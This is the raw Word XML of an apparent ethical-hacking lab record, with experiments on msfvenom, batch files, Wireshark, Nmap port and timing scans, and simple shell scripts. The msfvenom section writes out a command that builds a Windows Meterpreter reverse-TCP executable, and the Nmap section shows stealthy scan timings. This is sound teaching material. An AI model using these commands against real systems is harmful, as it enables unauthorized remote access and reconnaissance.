    <w:p w14:paraId="2D94F28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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to view its usage summary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4627DDA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List available payloads: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026F68FA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View configurable options: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> --list-options -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>meterpreter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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="071AE45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Review the syntax for generating a payload file and its supported output formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB77757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178FB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6A0DE0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msfvenom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-l payloads | head</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A32DB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Framework Payloads (593 total)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="341CC35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windows/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meterpreter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reverse_tcp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Inject Meterpreter (Windows x86)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E7E5A2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windows/shell/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reverse_tcp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Spawn shell over TCP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6055BF45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linux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/x86/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meterpreter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reverse_tcp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Inject Meterpreter (Linux x86)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="549794E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6375B45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msfvenom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--list-options -p windows/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meterpreter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reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="24B5569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Options for payload/windows/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meterpreter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reverse_tcp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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BC871C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Name    Current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Setting  Required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Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33C156E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LHOST       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yes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The listen address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B2FA89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LPORT   4444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yes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The listen port</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E62BBE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CCFAF6F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msfvenom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-p windows/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meterpreter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reverse_tcp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LHOST=192.168.1.10 LPORT=4444 -f exe &gt; payload.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="468A34B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[-] No platform was selected, choosing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Msf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::Module::Platform::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Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F14AF2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Payload size: 354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bytes  Final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size of exe file: 73802 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EAF4D01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msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload generator was explored in a controlled lab environment: available payloads were listed, the reverse-TCP payload options were reviewed, and the correct generation syntax was identified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262A11DB" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FBC704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21: Batch File Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740EB0BA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729ECC53" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To write a simple Windows batch (.bat) script that automates a sequence of command-prompt instructions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511176A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2600B65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Notepad and start the script with @echo off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045EDAE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Add echo lines for the text to display.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600A077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Add pause where the script should wait for a keypress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2118D93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Save the file as test.bat ('Save as type: All Files').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5150C5C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Double-click the file to run it and observe the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BF434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57ED5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83A25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C:\Users\Student&gt; notepad test.bat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AF72D3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test.bat --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="378E290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@echo off</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63C935D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Hello, this is a sample batch file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3923E88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Running network check...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="319B5D7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pause</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="305CF4A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-- end of file --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79223F0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C:\Users\Student&gt; test.bat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31D998C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Hello, this is a sample batch file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03C7206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Running network check...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0931D60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Press any key to continue . . .</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46FC234A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A simple batch script using @echo off, echo, and pause was written, saved with a .bat extension, and executed successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E2A121" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C4142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22: Packet Analyser Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E706BC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49E27872" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To practise the three core stages of packet analysis — capturing, filtering, and inspecting — using Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10338323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233A8166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Wireshark and start a capture on the chosen interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1682FBE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Generate TCP, UDP, and HTTP traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A076CB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Apply a display filter (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tcp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udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or http) to isolate traffic of interest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E29C7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Click a packet and expand its Frame, Ethernet, IP, and Transport layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15998854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Note the source/destination address, ports, and flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0FC519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21719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092DF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Wireshark - Capturing on Wi-Fi   |   Display filter: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</w:p>
          <w:p w14:paraId="41354D6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No.  Time    Source           Destination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Protocol  Length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Info</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34E8094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88   1.004   192.168.1.15     142.250.67.36    TCP       66      54212 &gt; 443 [SYN]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B8582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89   1.028   142.250.67.36    192.168.1.15     TCP       66      443 &gt; 54212 [SYN, ACK]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F1AEA4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90   1.029   192.168.1.15     142.250.67.36    TLSv1.3   583     Client Hello</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="769B316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AC468A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Frame 90: 583 bytes on wire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BEEEBB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Ethernet II,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08:00:27:4e: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66:a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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D49AC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Internet Protocol Version 4,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192.168.1.15,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142.250.67.36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72437878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Transmission Control Protocol,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Port: 54212,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Port: 443,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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DC124F7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TCP, UDP, and HTTP packets were captured, filtered by protocol, and inspected layer by layer in Wireshark's packet-detail view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B3D121" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A97B6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23: Port Scanning Tools (Extended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4AE7D9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36AD5BA8" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To control which ports Nmap checks using the -p, -p-, and -F flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A1FE1E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689EA6A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Repeat core scans (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, -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>, -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) against 192.168.1.1 for reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296D3CA0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Scan a specific range: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-p 1-30 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBB90A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Scan every port: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-p- 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAA32C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a fast scan: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-F 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086B1F1E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Compare scan duration and thoroughness across the options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10956A1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0EB3A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12A913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-p 1-30 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19ED1FC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PORT   STATE SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38E837D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  ftp</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3FB3B95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22/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open  ssh</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6CDAA80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2.10 seconds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B6C274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F2C6F0B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-p- 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06ACCA1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Discovered open port 3306/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on 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DD0DC8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118.44 seconds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40A9AFB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8C5E20E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-F 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A7E1B3C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Not shown: 95 closed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ports</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02E7B91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1.62 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E037AF6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Nmap's port-specification flags (-p, -p-, -F) were used to control the scope of a port scan, and the trade-off between speed and coverage was observed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0690FDAC" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03605BD9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24: Nmap Timing and Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B03554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5CFA9268" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To compare Nmap's six built-in timing templates (-T0 to -T5) for scan speed versus stealth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF9725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1DE6277B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-T0 192.168.1.1 (paranoid, slowest).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218566A3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-T1 192.168.1.1 (sneaky).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BF4399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-T2 192.168.1.1 and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-T3 192.168.1.1 (default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659109E4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-T4 192.168.1.1 (aggressive) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T5 192.168.1.1 (insane).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08354A5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Compare the elapsed scan time reported for each template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F71D5A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3F16C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1D5C27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-T0 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A6515E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Stats: 0:05:12 elapsed; 0 hosts completed (1 up)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1306925E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-T1 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E29EA66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Stats: 0:01:04 elapsed; 0 hosts completed (1 up)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29124B7C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-T3 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DE6946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4.71 seconds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D85B1B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-T4 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="742C084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1.83 seconds</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58467418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nmap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-T5 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21E09091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Nmap done: 1 IP address (1 host up) scanned in 0.96 seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68023EE5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The six Nmap timing templates were compared against the same target, showing the expected trade-off between scan speed and stealth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3933D42C" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F74ED" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Experiment 25: Shell Programming: Square of a Number and Biggest of Three Numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1572E1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Aim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE4DFDB" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To write and execute shell scripts that (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) read a number and find its square, and (ii) find the biggest of three numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C9E4A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Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47014C8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Open a terminal in Kali Linux and create a script file: nano square.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E1DA78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Write a script that reads a number and prints its square using arithmetic expansion $((...)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E86F7FF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Save the file, make it executable with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+x square.sh, then run ./square.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE4D9A4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Create a second script: nano biggest.sh, that reads three numbers and prints the largest using if-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287E208D" w14:textId="77777777" w:rsidR="00A04CDF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Save, make it executable with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x biggest.sh, and run ./biggest.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B38F00" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Observation / Output</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="3C3C3C"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="3C3C3C"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="3C3C3C"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="3C3C3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04CDF" w14:paraId="7DB8D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81BB4E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cat square.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33FB840A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bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5305524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"Enter a number:"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E31E45B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 n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B122EE2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=$((n * n))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="739D53F0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"Square of $n is $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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75AA151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8F8441D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 xml:space="preserve"> +x square.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0759D2E6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./square.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BFC642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Enter a number:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C9BC2A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7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E8846C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Square of 7 is 49</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D0F4723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E28C835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cat biggest.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D955F77" w14:textId="77777777" w:rsidR="00A04CDF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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="067C134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"Enter three numbers:"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60FC435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 a b c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B125F2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then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F09829D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echo "Biggest: $a"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AE4A8BD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 then</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="712A1D1E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echo "Biggest: $b"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77AC0C8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else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E6937A4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echo "Biggest: $c"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="458842A7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fi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1771E3BA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73A0EFF" w14:textId="77777777" w:rsidR="00A04CD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kali@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kali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:~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4EC9B0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>$ ./biggest.sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="595DF77F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Enter three numbers:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04EC9915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12 45 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03B97B39" w14:textId="77777777" w:rsidR="00A04CD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Biggest: 45</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37FD51F1" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Two shell scripts were written and executed successfully — one calculating the square of a number, and the other identifying the largest of three input numbers.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A04CD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4B6F6" w14:textId="77777777" w:rsidR="00D15E2C" w:rsidRDefault="00D15E2C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1B7ADDA6" w14:textId="77777777" w:rsidR="00D15E2C" w:rsidRDefault="00D15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02FED" w14:textId="77777777" w:rsidR="00A04CDF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A159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60EE" w14:textId="77777777" w:rsidR="00D15E2C" w:rsidRDefault="00D15E2C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3F9F6E3D" w14:textId="77777777" w:rsidR="00D15E2C" w:rsidRDefault="00D15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32BD" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:iCs/>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>Ethical Hacking Lab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7D44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97D093B0"/>
    <w:lvl w:ilvl="0" w:tplc="352AE7D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="26E8178A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="67BE3A1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FF2E3C40">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E6EC8A28">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BEDA41B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="09FC6F7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B420D272">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1A9E9252">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1814978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CDF"/>
    <w:rsid w:val="001A1595"/>
    <w:rsid w:val="00215F9E"/>
    <w:rsid w:val="00A04CDF"/>
    <w:rsid w:val="00D1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94FE"/>
  <w15:docId w15:val="{500B0113-2D97-413C-873A-2A709EA4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4364</Words>
  <Characters>24879</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>207</Lines>
  <Paragraphs>58</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>29185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vv7798518@gmail.com</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-21T08:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-21T08:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>